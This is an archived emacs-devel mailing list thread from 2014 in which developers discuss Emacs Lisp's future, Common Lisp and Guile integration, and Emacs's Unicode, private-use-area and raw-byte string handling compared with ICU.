> other languages? I think for example that Javascript will be something most
> future programmers will know. Could Guile make it easier to enhance Emacs
> with Javascript (as an alternative to Elisp)?

"It's nice that the students coming to us already know Java.  We just
have to teach them how to program."

                -- Michael Sperber




* Re: Emacs Lisp's future
  2014-09-17 17:53     ` Stefan Monnier
  2014-09-17 21:46       ` Stefan Monnier
@ 2014-09-18 18:59       ` Johan Bockgård
  2014-09-18 21:01       ` Sam Steingold
  2 siblings, 0 replies; 261+ messages in thread
From: Johan Bockgård @ 2014-09-18 18:59 UTC (permalink / raw)
  To: emacs-devel

Stefan Monnier <monnier@iro.umontreal.ca> writes:

> Sounds good.  If someone wants to look deeper into what it would take to
> use ECL in Emacs, that would be very welcome.

You could try asking ECL's author,

http://article.gmane.org/gmane.lisp.ecl.general/345




* Re: Emacs Lisp's future
  2014-09-17 17:53     ` Stefan Monnier
  2014-09-17 21:46       ` Stefan Monnier
  2014-09-18 18:59       ` Johan Bockgård
@ 2014-09-18 21:01       ` Sam Steingold
  2014-09-19  0:56         ` Stefan Monnier
  2 siblings, 1 reply; 261+ messages in thread
From: Sam Steingold @ 2014-09-18 21:01 UTC (permalink / raw)
  To: emacs-devel

> * Stefan Monnier <zbaavre@veb.hzbagerny.pn> [2014-09-17 13:53:45 -0400]:
>
> Of course, another issue with Common-Lisp integration is that we'd
> want to figure out how to integrate the two languages.  So, we'd need
> to investigate what are the current incompatibilities.

Running ELisp code in CL has been supported for 15 years.
http://sourceforge.net/p/clocc/hg/ci/default/tree/src/cllib/elisp.lisp

-- 
Sam Steingold (http://sds.podval.org/) on darwin Ns 10.3.1265
http://www.childpsy.net/ http://palestinefacts.org http://iris.org.il
http://memri.org http://truepeace.org http://openvotingconsortium.org
Lottery is a tax on statistics ignorants.  MS is a tax on computer-idiots.





* Re: Emacs Lisp's future
  2014-09-18 21:01       ` Sam Steingold
@ 2014-09-19  0:56         ` Stefan Monnier
  2014-09-19 12:24           ` Sam Steingold
  0 siblings, 1 reply; 261+ messages in thread
From: Stefan Monnier @ 2014-09-19  0:56 UTC (permalink / raw)
  To: Sam Steingold; +Cc: emacs-devel

>> * Stefan Monnier <zbaavre@veb.hzbagerny.pn> [2014-09-17 13:53:45 -0400]:
>> Of course, another issue with Common-Lisp integration is that we'd
>> want to figure out how to integrate the two languages.  So, we'd need
>> to investigate what are the current incompatibilities.
> Running ELisp code in CL has been supported for 15 years.
> http://sourceforge.net/p/clocc/hg/ci/default/tree/src/cllib/elisp.lisp

As mentioned when someone pointed to a CL-to-Elisp compiler, compiling
one language to another is actually slightly different from integrating
two languages.


        Stefan




* Re: Emacs Lisp's future
  2014-09-19  0:56         ` Stefan Monnier
@ 2014-09-19 12:24           ` Sam Steingold
  0 siblings, 0 replies; 261+ messages in thread
From: Sam Steingold @ 2014-09-19 12:24 UTC (permalink / raw)
  To: emacs-devel

> * Stefan Monnier <zbaavre@veb.hzbagerny.pn> [2014-09-18 20:56:49 -0400]:
>
>>> * Stefan Monnier <zbaavre@veb.hzbagerny.pn> [2014-09-17 13:53:45 -0400]:
>>> Of course, another issue with Common-Lisp integration is that we'd
>>> want to figure out how to integrate the two languages.  So, we'd need
>>> to investigate what are the current incompatibilities.
>> Running ELisp code in CL has been supported for 15 years.
>> http://sourceforge.net/p/clocc/hg/ci/default/tree/src/cllib/elisp.lisp
>
> As mentioned when someone pointed to a CL-to-Elisp compiler, compiling
> one language to another is actually slightly different from
> integrating two languages.

I am puzzled by this distinction.

When you load elisp.lisp into your CL, you can

* load ELisp files, e.g.,
>>> (el::load "backquote")
>>> (el::load "calendar")
>>> (el::load "cal-hebrew")
>>> (el::load "subr")
>>> (el::load "help")

* Compile them:
>>> (cllib::compile-el-file "backquote")
>>> (cllib::compile-el-file "calendar")
>>> (cllib::compile-el-file "cal-hebrew")

* Run ELisp code:
>>> (el::calendar-hebrew-date-string)

I am not sure what is missing.

-- 
Sam Steingold (http://sds.podval.org/) on darwin Ns 10.3.1265
http://www.childpsy.net/ http://islamexposedonline.com
http://americancensorship.org http://memri.org http://mideasttruth.com
Just because you're paranoid doesn't mean they AREN'T after you.





* Re: Emacs Lisp's future
  2014-09-17  7:38 Emacs Lisp's future (was: Guile emacs thread (again)) Kristian Nygaard Jensen
  2014-09-17 15:15 ` Emacs Lisp's future Stefan Monnier
@ 2014-09-26 13:43 ` Robin Templeton
  2014-09-26 14:15   ` David Kastrup
  1 sibling, 1 reply; 261+ messages in thread
From: Robin Templeton @ 2014-09-26 13:43 UTC (permalink / raw)
  To: emacs-devel

Kristian Nygaard Jensen <freeduck@member.fsf.org> writes:

>> Of course, that's for the language side, but on the implementation side,
>> I don't really know what Common-Lisp implementation we could re-use
>> (both GNU implementations are dormant, so there's no manpower for us
>> to tap into).  Still: there are many Common-Lisp implementations out there,
>> so there's probably one that could work for us.
>
> Embeddable Common-Lisp (http://sourceforge.net/projects/ecls/) seems
> alive, it is lgpl, so there would be no license issue

ECL's maintainer resigned last year:
<http://permalink.gmane.org/gmane.lisp.ecl.general/10264>. There have
been no releases since, and recent mailing list posts indicate that
there is no current maintainer.

-- 
An intelligent person learns the language Esperanto quickly and easily.
Esperanto is a modern, cultured language for the world. Simple, flexible,
melodious, Esperanto is the practical solution to the problem of universal
mutual understanding. Learn the interlanguage Esperanto!





* Re: Emacs Lisp's future
  2014-09-26 13:43 ` Robin Templeton
@ 2014-09-26 14:15   ` David Kastrup
  2014-09-26 14:45     ` Dmitry Antipov
  0 siblings, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-09-26 14:15 UTC (permalink / raw)
  To: emacs-devel

Robin Templeton <robin@terpri.org> writes:

> Kristian Nygaard Jensen <freeduck@member.fsf.org> writes:
>
>>> Of course, that's for the language side, but on the implementation side,
>>> I don't really know what Common-Lisp implementation we could re-use
>>> (both GNU implementations are dormant, so there's no manpower for us
>>> to tap into).  Still: there are many Common-Lisp implementations out there,
>>> so there's probably one that could work for us.
>>
>> Embeddable Common-Lisp (http://sourceforge.net/projects/ecls/) seems
>> alive, it is lgpl, so there would be no license issue
>
> ECL's maintainer resigned last year:
> <http://permalink.gmane.org/gmane.lisp.ecl.general/10264>. There have
> been no releases since, and recent mailing list posts indicate that
> there is no current maintainer.

While not an example for how to keep one's temper, in the course of
<URL:http://debbugs.gnu.org/cgi/bugreport.cgi?bug=18520> I suggest that
Emacs buffers could be based on string ports with random access.

The basic idea here is, of course, that the fundamental operation of a
string port is adding unknown amounts of material "at point".
Personally, I think that there is a lot of potential to tie strings,
encodings, buffers, ports quite closely together in Emacs and Guile, and
part of that reason is that I consider Emacs' multinational
string/buffer/multibyte/unibyte handling a lot more mature in concepts
and implementation than that of GUILE.  Scheme does not prescribe a
whole lot regarding the details of character sets and string handling
(except that Scheme strings tend to have a stronger focus on being
rewritable, something that works pretty badly on variable-length
encodings but which Emacs purports to support at least using aset).  And
I think that the user and application pressure on Emacs/MULE in that
regard has in the time since Emacs 20 led to pretty good solutions.

GUILE in particular has problems coming to grips with the difference
between "internal UTF-8 based encoding" and "external UTF-8 encoding
which might contain bytes violating the UTF-8 guarantees" and with
avoiding unnecessary crossbleed between them.  Since Emacs historically
had a completely different internal multibyte encoding, it has kept
those apart much more cleanly.

If GUILE wants to take over Emacs regarding its computing, I think it
first has to get itself infiltrated by Emacs' handling of strings and
buffers.  I have no idea whether this should go as far as to replace
iconv with CCL programs.  It would have the advantage of using actively
maintained and used GNU-controlled technology for the multi-language
stuff (and Emacs is rather good in that area), but I have no idea how
good a fit this could be.

At any rate: the Scheme standards leave a lot of things open regarding
actual multinational character set and string support, and I feel that
the historic pressure of the text-based Emacs might have done a better
job so far of producing concepts and results that work well in practice
than what the GUILE developers were forced to work with regarding
foreign alphabets.

So instead of interfacing one to the other, I think GUILE has more to
win than to lose by adopting some of the Emacs concepts and data models
regarding text/string processing rather than designing its own.

-- 
David Kastrup





* Re: Emacs Lisp's future
  2014-09-26 14:15   ` David Kastrup
@ 2014-09-26 14:45     ` Dmitry Antipov
  2014-09-26 15:05       ` David Kastrup
  2014-09-26 15:07       ` Eli Zaretskii
  0 siblings, 2 replies; 261+ messages in thread
From: Dmitry Antipov @ 2014-09-26 14:45 UTC (permalink / raw)
  To: David Kastrup; +Cc: emacs-devel

On 09/26/2014 06:15 PM, David Kastrup wrote:

> So instead of interfacing one to the other, I think GUILE has more to
> win than to lose by adopting some of the Emacs concepts and data models
> regarding text/string processing rather than designing its own.

Adopting Emacs?  Why not just use ICU?  This project's page claims a
"GPL-compatible" free license (http://userguide.icu-project.org/icufaq).

Dmitry





* Re: Emacs Lisp's future
  2014-09-26 14:45     ` Dmitry Antipov
@ 2014-09-26 15:05       ` David Kastrup
  2014-09-27  8:44         ` Stephen J. Turnbull
  2014-09-26 15:07       ` Eli Zaretskii
  1 sibling, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-09-26 15:05 UTC (permalink / raw)
  To: Dmitry Antipov; +Cc: emacs-devel

Dmitry Antipov <dmantipov@yandex.ru> writes:

> On 09/26/2014 06:15 PM, David Kastrup wrote:
>
>> So instead of interfacing one to the other, I think GUILE has more to
>> win than to lose by adopting some of the Emacs concepts and data models
>> regarding text/string processing rather than designing its own.
>
> Adopting Emacs?  Why not just use ICU?  This project's page claims a
> "GPL-compatible" free license (http://userguide.icu-project.org/icufaq).

Because ICU is not under the control of the GNU project.  Whenever we
have a need that has to be met, it is not a priority for ICU.  For
example, it is an error for ICU if some string cannot properly be
decoded.

Emacs is capable of decoding random byte strings "as utf-8" and reencoding
them afterwards to get back the original byte string, by using special
characters to indicate "undecodable byte".  This means that if you edit
some source code file where comments have been added in different
encodings, or which contains strings in several different encodings for
whatever reason, you can save the file afterwards and have it only
changed in those sections you actually edited, without any modifications
in sections you did not touch but which still had to go through decoding
on load and encoding on save.
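
The round trip described above can be illustrated with a minimal Python
sketch.  This is an analogy only: it uses Python's `surrogateescape`
error handler, which maps each undecodable byte to a lone surrogate, and
it makes no claim about how Emacs implements the same idea internally.

```python
# A byte string that is NOT valid UTF-8: a Latin-1 "e acute" (0xE9)
# sits next to correctly encoded UTF-8 text.
original = b"caf\xe9 / caf\xc3\xa9\n"

# Decode leniently: each undecodable byte becomes a lone surrogate in
# U+DC80..U+DCFF instead of raising an error.
text = original.decode("utf-8", errors="surrogateescape")

# Edit only a part of the text that decoded cleanly.
edited = text.replace("/", "|")

# Encode with the same handler: the untouched invalid byte comes back
# verbatim, so only the edited section differs from the original file.
saved = edited.encode("utf-8", errors="surrogateescape")
print(saved == original.replace(b"/", b"|"))
```

A strict decoder would reject the file at load time instead, which is
the "it is an error" behaviour mentioned earlier in this message.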

For an editor, those are very important features.  For a third-party
library, stuff like that may not be a priority.

In addition, Emacs' string handling and encoding/reencoding has a longer
history than UTF-8 and most such libraries.  It's mature, and it
definitely fits Emacs' bill.

-- 
David Kastrup




* Re: Emacs Lisp's future
  2014-09-26 14:45     ` Dmitry Antipov
  2014-09-26 15:05       ` David Kastrup
@ 2014-09-26 15:07       ` Eli Zaretskii
  2014-09-26 15:21         ` David Kastrup
  2014-09-27  8:35         ` Stephen J. Turnbull
  1 sibling, 2 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-09-26 15:07 UTC (permalink / raw)
  To: Dmitry Antipov; +Cc: dak, emacs-devel

> Date: Fri, 26 Sep 2014 18:45:54 +0400
> From: Dmitry Antipov <dmantipov@yandex.ru>
> Cc: emacs-devel@gnu.org
> 
> Why not just use ICU?

Emacs needs to be able to extend the Unicode code-point space for raw
8-bit bytes and for a couple of character sets that are not unified.
Can ICU support that?  If not, we cannot base our implementation on
ICU without a lot of redesign.





* Re: Emacs Lisp's future
  2014-09-26 15:07       ` Eli Zaretskii
@ 2014-09-26 15:21         ` David Kastrup
  2014-09-27  8:35         ` Stephen J. Turnbull
  1 sibling, 0 replies; 261+ messages in thread
From: David Kastrup @ 2014-09-26 15:21 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: Dmitry Antipov, emacs-devel

Eli Zaretskii <eliz@gnu.org> writes:

>> Date: Fri, 26 Sep 2014 18:45:54 +0400
>> From: Dmitry Antipov <dmantipov@yandex.ru>
>> Cc: emacs-devel@gnu.org
>> 
>> Why not just use ICU?
>
> Emacs needs to be able to extend the Unicode code-point space for raw
> 8-bit bytes and for a couple of character sets that are not unified.
> Can ICU support that?  If not, we cannot base our implementation on
> ICU without a lot of redesign.

Well, the context here was the integration of Emacs and GUILE, and it
would be optimistic to think that efficient string/buffer handling will
not leave us with a lot of redesign either way.

Matching GUILE and Emacs allows us to compare and integrate the best
approaches from either side.  With ICU, it will always be "take it or
leave it".  It may be good enough.  If it isn't in some small respect,
getting it changed or fixed is not under our control.

-- 
David Kastrup




* Re: Emacs Lisp's future
  2014-09-26 15:07       ` Eli Zaretskii
  2014-09-26 15:21         ` David Kastrup
@ 2014-09-27  8:35         ` Stephen J. Turnbull
  2014-09-27  8:49           ` David Kastrup
  2014-09-27  9:32           ` Eli Zaretskii
  1 sibling, 2 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-09-27  8:35 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: Dmitry Antipov, dak, emacs-devel

Eli Zaretskii writes:
 > > Date: Fri, 26 Sep 2014 18:45:54 +0400
 > > From: Dmitry Antipov <dmantipov@yandex.ru>
 > > Cc: emacs-devel@gnu.org
 > > 
 > > Why not just use ICU?
 > 
 > Emacs needs to be able to extend the Unicode code-point space for raw
 > 8-bit bytes and for a couple of character sets that are not unified.

No, you don't.  There's plenty of private space for those purposes
(unless you know of private character sets that use more than two
whole planes?)  Emacs would simply use an indirect representation for
private space.  (That is, code points in private space are not
necessarily identical to the input code points, but rather are indexes
into an auxiliary table which implements the disjoint sum of the
private code spaces in use.)

Since this is private space, you need to build a table of attributes
for these characters (I/O representation, UCD properties, glyphs, etc)
anyway.  For Unicode input using private space, you just record that
as the I/O representation.
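
A rough Python sketch of the indirect representation proposed above,
under stated assumptions: the class `PrivateSpaceTable`, its method
names, and the choice of Plane 15 as the only pool are all hypothetical
and chosen for illustration.  Private code points are handed out in
order of first use, so they are indexes into the table rather than
copies of the input codes.

```python
class PrivateSpaceTable:
    """Map (charset, code) pairs to code points in Plane 15's PUA."""

    FIRST = 0xF0000  # start of Supplementary Private Use Area-A
    LAST = 0xFFFFD   # end of Supplementary Private Use Area-A

    def __init__(self):
        self._to_private = {}    # (charset, code) -> private code point
        self._from_private = []  # slot index -> (charset, code), the I/O form

    def intern(self, charset, code):
        """Return the private code point for this pair, allocating if new."""
        key = (charset, code)
        if key not in self._to_private:
            cp = self.FIRST + len(self._from_private)
            if cp > self.LAST:
                raise OverflowError("private use area exhausted")
            self._to_private[key] = cp
            self._from_private.append(key)
        return self._to_private[key]

    def external(self, cp):
        """Recover the original (charset, code) pair for output."""
        return self._from_private[cp - self.FIRST]


table = PrivateSpaceTable()
a = table.intern("charset-a", 0x2121)
b = table.intern("charset-b", 0x2121)  # same code, different charset
print(hex(a), hex(b), table.external(b))
```

The two inputs share a code but land in different slots, which is the
"disjoint sum" property; the cost is one table lookup per conversion.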

 > Can ICU support that?

Maybe it would be unhappy if you used a lone surrogate representation
(or other representation using integers outside of the Unicode
character space) for those "extended code points", but as proposed
above you can efficiently use private space in practice.








* Re: Emacs Lisp's future
  2014-09-26 15:05       ` David Kastrup
@ 2014-09-27  8:44         ` Stephen J. Turnbull
  2014-09-27  8:59           ` David Kastrup
  0 siblings, 1 reply; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-09-27  8:44 UTC (permalink / raw)
  To: David Kastrup; +Cc: Dmitry Antipov, emacs-devel

David Kastrup writes:
 > Dmitry Antipov <dmantipov@yandex.ru> writes:

 > > Adopting Emacs?  Why not just use ICU?  This project's page claims a
 > > "GPL-compatible" free license (http://userguide.icu-project.org/icufaq).
 > 
 > Because ICU is not under the control of the GNU project.

You can say the same about the Linux kernel, for example.
Nevertheless, the HURD has never made it to ready-for-prime-time
status.  At some point it's worth delegating maintenance of 99% of
your needs to another project, and Emacs has already been through the
Mule-to-Unicode internal encoding conversion.  Would you really wish
that on another project?

 > In addition, Emacs' string handling and encoding/reencoding has a
 > longer history than UTF-8 and most such libraries.  It's mature,
 > and it definitely fits Emacs' bill.

I really doubt it will take much effort to move Emacs to ICU (compared
to grafting Emacs's complex internal facilities onto another project).





* Re: Emacs Lisp's future
  2014-09-27  8:35         ` Stephen J. Turnbull
@ 2014-09-27  8:49           ` David Kastrup
  2014-09-27  9:32           ` Eli Zaretskii
  1 sibling, 0 replies; 261+ messages in thread
From: David Kastrup @ 2014-09-27  8:49 UTC (permalink / raw)
  To: Stephen J. Turnbull; +Cc: Eli Zaretskii, Dmitry Antipov, emacs-devel

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> Eli Zaretskii writes:
>  > > Date: Fri, 26 Sep 2014 18:45:54 +0400
>  > > From: Dmitry Antipov <dmantipov@yandex.ru>
>  > > Cc: emacs-devel@gnu.org
>  > > 
>  > > Why not just use ICU?
>  > 
>  > Emacs needs to be able to extend the Unicode code-point space for raw
>  > 8-bit bytes and for a couple of character sets that are not unified.
>
> No, you don't.  There's plenty of private space for those purposes
> (unless you know of private character sets that use more than two
> whole planes?)  Emacs would simply use an indirect representation for
> private space.  (That is, code points in private space are not
> necessarily identical to the input code points, but rather are indexes
> into an auxiliary table which implements the disjoint sum of the
> private code spaces in use.)
>
> Since this is private space, you need to build a table of attributes
> for these characters (I/O representation, UCD properties, glyphs, etc)
> anyway.  For Unicode input using private space, you just record that
> as the I/O representation.
>
>  > Can ICU support that?
>
> Maybe it would be unhappy if you used a lone surrogate representation
> (or other representation using integers outside of the Unicode
> character space) for those "extended code points", but as proposed
> above you can efficiently use private space in practice.

Except that Emacs, as an editor, needs to support the private spaces
users might want to use.  Hijacking the surrogates is a reasonable
compromise.  Another would have been hijacking the 4-byte encodable code
space beyond Unicode character 1114111 that is outside of UTF-8 but
inside of the coding scheme's logic and thus working equally well for
string manipulations: however, that would cause unencodable bytes to
take up more space.  I think LuaTeX may use that strategy.
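
As a hedged illustration of the second option, the following Python
sketch applies the 4-byte UTF-8 bit layout to values past 1114111
(0x10FFFF).  The function `encode_4byte` and the mapping of raw bytes to
the values just past the Unicode range are assumptions made for this
example; they do not describe what Emacs or LuaTeX actually do.

```python
def encode_4byte(cp: int) -> bytes:
    """Encode cp with the 4-byte UTF-8 bit layout, ignoring the U+10FFFF cap.

    Layout: 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx (21 payload bits).
    """
    if not 0x10000 <= cp <= 0x1FFFFF:
        raise ValueError("code point does not fit the 4-byte layout")
    return bytes([
        0xF0 | (cp >> 18),
        0x80 | ((cp >> 12) & 0x3F),
        0x80 | ((cp >> 6) & 0x3F),
        0x80 | (cp & 0x3F),
    ])


MAX_UNICODE = 0x10FFFF  # decimal 1114111

# For legal code points the layout agrees with real UTF-8.
assert encode_4byte(MAX_UNICODE) == chr(MAX_UNICODE).encode("utf-8")

# Hypothetical mapping: park raw byte 0xE9 just past the Unicode range.
raw_byte = 0xE9
print(encode_4byte(MAX_UNICODE + 1 + raw_byte).hex())

# Spare values the 4-byte layout offers beyond Unicode.
print(0x1FFFFF - MAX_UNICODE)
```

Each stray byte then occupies four bytes in the buffer, which is the
space cost mentioned above.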

Being an editor, Emacs has to be more circumspect than most other
encoding-sensitive applications about what it may work with since
everything that is "private" may well be within the range that a user
wants to be able to put into string literals.

-- 
David Kastrup




* Re: Emacs Lisp's future
  2014-09-27  8:44         ` Stephen J. Turnbull
@ 2014-09-27  8:59           ` David Kastrup
  2014-09-27 15:30             ` Stephen J. Turnbull
  0 siblings, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-09-27  8:59 UTC (permalink / raw)
  To: Stephen J. Turnbull; +Cc: Dmitry Antipov, emacs-devel

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> David Kastrup writes:
>  > Dmitry Antipov <dmantipov@yandex.ru> writes:
>
>  > > Adopting Emacs?  Why not just use ICU?  This project's page claims a
>  > > "GPL-compatible" free license (http://userguide.icu-project.org/icufaq).
>  > 
>  > Because ICU is not under the control of the GNU project.
>
> You can say the same about the Linux kernel, for example.

The last time I looked, Emacs ran on more platforms than GNU/Linux.  We
don't have a tie-in here.

> Nevertheless, the HURD has never made it to ready-for-prime-time
> status.  At some point it's worth delegating maintenance of 99% of
> your needs to another project, and Emacs has already been through the
> Mule-to-Unicode internal encoding conversion.  Would you really wish
> that on another project?

The point is that "GUILE" and "Emacs" are slated to be linked, and that
will not happen if that would seriously degrade Emacs' usability for
working with texts.  It is a core capability of Emacs we are talking
about here.

>  > In addition, Emacs' string handling and encoding/reencoding has a
>  > longer history than UTF-8 and most such libraries.  It's mature,
>  > and it definitely fits Emacs' bill.
>
> I really doubt it will take much effort to move Emacs to ICU (compared
> to grafting Emacs's complex internal facilities onto another project).

If it would not take much effort, then it should be attempted
independently.  Only in that manner can one properly estimate the
respective performance, footprint, programming and compatibility impacts
independently from those of moving to GUILE.

But that still does not touch the problem of making a core tenet of
Emacs, one where Emacs needs to perform better and be more versatile than
most other applications and where performance matters much more than it
does for most applications, depend on an externally controlled and
maintained library.

That's a particularly important reason for evaluating an ICU dependency
in a separate branch independent from GUILE first.

-- 
David Kastrup




* Re: Emacs Lisp's future
  2014-09-27  8:35         ` Stephen J. Turnbull
  2014-09-27  8:49           ` David Kastrup
@ 2014-09-27  9:32           ` Eli Zaretskii
  2014-09-27 10:37             ` Stephen J. Turnbull
  2014-09-29 13:17             ` K. Handa
  1 sibling, 2 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-09-27  9:32 UTC (permalink / raw)
  To: Stephen J. Turnbull, Kenichi Handa; +Cc: dmantipov, dak, emacs-devel

> From: "Stephen J. Turnbull" <stephen@xemacs.org>
> Date: Sat, 27 Sep 2014 17:35:12 +0900
> Cc: Dmitry Antipov <dmantipov@yandex.ru>, dak@gnu.org, emacs-devel@gnu.org
> 
> Eli Zaretskii writes:
>  > > Date: Fri, 26 Sep 2014 18:45:54 +0400
>  > > From: Dmitry Antipov <dmantipov@yandex.ru>
>  > > Cc: emacs-devel@gnu.org
>  > > 
>  > > Why not just use ICU?
>  > 
>  > Emacs needs to be able to extend the Unicode code-point space for raw
>  > 8-bit bytes and for a couple of character sets that are not unified.
> 
> No, you don't.  There's plenty of private space for those purposes
> (unless you know of private character sets that use more than two
> whole planes?)

I take it that you have studied the charsets for which we use
codepoints above 0x10FFFF, and concluded that they all fit in the
2*64K+6.4K PUA space provided by Unicode?  We have several quite large
character sets which need that (grep mule-conf.el for ":unify-map" to
see the list, and see etc/charsets/ for the map files).  I'm not sure
the PUA space is large enough, but I didn't sum all the numbers.

In any case, the question why we don't use PUA for this is best
addressed to Handa-san (CC'ed).

> Emacs would simply use an indirect representation for
> private space.  (That is, code points in private space are not
> necessarily identical to the input code points, but rather are indexes
> into an auxiliary table which implements the disjoint sum of the
> private code spaces in use.)

IIUC, this is a non-trivial complication.  Currently, our mapping is
set up so that we can keep the non-unified characters in our buffers,
while you propose indirection via tables.  This means, for example,
that direct access to char-tables will become slower.

> Since this is private space, you need to build a table of attributes
> for these characters (I/O representation, UCD properties, glyphs, etc)
> anyway.  For Unicode input using private space, you just record that
> as the I/O representation.

Yes, and the question is how well ICU supports setting these up.
I don't know the answer to that.

It is also not clear to me whether what you suggest will support the
internal representation of raw bytes and their conversion to and from
their external (a.k.a. "encoded") 8-bit values.

In any case, I agree that using ICU in Guile would be a huge step
forward, because currently they simply rely on the underlying libc,
which is only a more-or-less safe bet when libc is glibc; if not, the
results fall very short of what the user needs and Emacs expects.




* Re: Emacs Lisp's future
  2014-09-27  9:32           ` Eli Zaretskii
@ 2014-09-27 10:37             ` Stephen J. Turnbull
  2014-09-27 11:13               ` David Kastrup
  2014-09-29 13:17             ` K. Handa
  1 sibling, 1 reply; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-09-27 10:37 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: Kenichi Handa, dmantipov, dak, emacs-devel

Eli Zaretskii writes:

 > I take it that you have studied the charsets for which we use
 > codepoints above 0x10FFFF, and concluded that they all fit in the
 > 2*64K+6.4K PUA space provided by Unicode?

No, I've studied the coded character sets that are actually used by
real people in this world, and concluded that for practical purposes,
the Unicode coded character set plus the PUA permits representing all
of them satisfactorily for a TTY, and that the additional burden of
disambiguating them (eg, for font choice in a GUI) should be handled
by markup (eg, the XML lang attribute in text/* representations, and
text properties in Emacs).

 > We have several quite large character sets which need that (grep
 > mule-conf.el for ":unify-map" to see the list, and see
 > etc/charsets/ for the map files).  I'm not sure the PUA space is
 > large enough, but I didn't sum all the numbers.

If :unify-map really means that all of those character sets are mapped
injectively into the Emacs coded character set, OK, it's just Mule
code all over again.  Since CNS alone has about 80,000 characters in
it and that's just for a start, no, there is not enough space in the
Unicode PUA for complete (and mostly redundant) copies of a double
handful of Han character sets.
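
The capacity argument can be checked with a little arithmetic, sketched
here in Python.  The three ranges are the Private Use Areas defined by
Unicode; the 80,000 figure is the approximate size quoted above and is
treated as an estimate, not an exact count.

```python
# The three Private Use Areas defined by Unicode (inclusive ranges).
PUA_RANGES = {
    "BMP PUA": (0xE000, 0xF8FF),
    "Plane 15 (PUA-A)": (0xF0000, 0xFFFFD),
    "Plane 16 (PUA-B)": (0x100000, 0x10FFFD),
}

capacity = sum(last - first + 1 for first, last in PUA_RANGES.values())
print(capacity)

# Approximate size quoted in the message above.
CNS_APPROX = 80_000
print(capacity // CNS_APPROX)  # how many sets of that size would fit
```

This matches the "2*64K+6.4K" estimate quoted earlier: one set of that
size fits, but several full copies of large Han sets would not.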





* Re: Emacs Lisp's future
  2014-09-27 10:37             ` Stephen J. Turnbull
@ 2014-09-27 11:13               ` David Kastrup
  2014-09-27 12:00                 ` Eli Zaretskii
  2014-09-27 15:34                 ` Stephen J. Turnbull
  0 siblings, 2 replies; 261+ messages in thread
From: David Kastrup @ 2014-09-27 11:13 UTC (permalink / raw)
  To: Stephen J. Turnbull; +Cc: Kenichi Handa, Eli Zaretskii, dmantipov, emacs-devel

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> Eli Zaretskii writes:
>
>  > I take it that you have studied the charsets for which we use
>  > codepoints above 0x10FFFF, and concluded that they all fit in the
>  > 2*64K+6.4K PUA space provided by Unicode?
>
> No, I've studied the coded character sets that are actually used by
> real people in this world, and concluded that for practical purposes,

For practical purposes, real people use Microsoft Word.

> the Unicode coded character set plus the PUA permits representing all
> of them satisfactorily for a TTY, and that the additional burden of
> disambiguating them (eg, for font choice in a GUI) should be handled
> by markup (eg, the XML lang attribute in text/* representations, and
> text properties in Emacs).

Emacs has invested a lot of work and energy into getting encodings
right.  MULE was the principal reason for the last large migration of
Emacs users to XEmacs (around Emacs 20), and it was a significant reason
for a slow but steady migration trickle back when multinational
character sets became ubiquitous and the initial painful investment of
Emacs into them paid back in the form of a longer matured
implementation.  I remember XEmacs having an implementation of the
"works for real people for practical purposes" kind where the principal
maintainers do not appear to be fundamentally immersed in the problem
space, because those for whom multinational character sets were an
essential feature went to work on and with Emacs instead.

Whether or not that's revisionism, I think that there is little doubt
that Emacs has a solid history of experience dealing with Far Eastern
character sets and texts.  The same cannot be said for R->L typesetting.
However, the problems specific to R->L typesetting are mostly not in the
character set and string handling area but rather concern the display
algorithms where we already found that supporting all the functionality
of Emacs is not well-supported by industry-standard solutions like
Pango.

In short, it is not likely we are talking about a no-brainer regarding
rebasing MULE on something else.  If we were, it would appear to me that
XEmacs would have had more to gain from such a step than Emacs, and
there is likely some reason that they chose not to do so.

-- 
David Kastrup




* Re: Emacs Lisp's future
  2014-09-27 11:13               ` David Kastrup
@ 2014-09-27 12:00                 ` Eli Zaretskii
  2014-09-27 14:04                   ` Stefan Monnier
  2014-09-27 15:34                 ` Stephen J. Turnbull
  1 sibling, 1 reply; 261+ messages in thread
From: Eli Zaretskii @ 2014-09-27 12:00 UTC (permalink / raw)
  To: David Kastrup; +Cc: handa, stephen, dmantipov, emacs-devel

> From: David Kastrup <dak@gnu.org>
> Cc: Eli Zaretskii <eliz@gnu.org>,  Kenichi Handa <handa@gnu.org>,  dmantipov@yandex.ru,  emacs-devel@gnu.org
> Date: Sat, 27 Sep 2014 13:13:26 +0200
> 
> However, the problems specific to R->L typesetting are mostly not in the
> character set and string handling area but rather concern the display
> algorithms where we already found that supporting all the functionality
> of Emacs is not well-supported by industry-standard solutions like
> Pango.

Only people who don't speak any of the R2L languages can seriously
claim that using Pango/Cairo is the way to support R2L in Emacs.
There are just too many quirks that Emacs needs for user satisfaction
that an external GP renderer can never provide.

Using Pango also means you are at the mercy of their developers as far
as bidi is concerned.  And it doesn't help that the development in
that area is not really "alive and kicking" as one would hope; e.g.,
the latest changes in UAX#9, released with Unicode 6.3 a year ago, are
still not supported in Pango or FriBidi.

Besides, using Pango means no bidi in text-mode frames.  (Some people
say this should be delegated to bidi-aware terminal emulators, like
PuTTY and some Linux-based emulator whose name I don't remember, but
that's again only because those people don't use the R2L scripts.
Doing bidi display for TTY Emacs this way is simply unworkable.)




* Re: Emacs Lisp's future
  2014-09-27 12:00                 ` Eli Zaretskii
@ 2014-09-27 14:04                   ` Stefan Monnier
  2014-09-27 14:24                     ` David Kastrup
  0 siblings, 1 reply; 261+ messages in thread
From: Stefan Monnier @ 2014-09-27 14:04 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: handa, stephen, David Kastrup, dmantipov, emacs-devel

Could you move on to some other discussion?
I mean, it's not like this is a problem we need to fix now (if ever).
So let's cross this bridge when we get there.


        Stefan


>>>>> "Eli" == Eli Zaretskii <eliz@gnu.org> writes:

>> From: David Kastrup <dak@gnu.org>
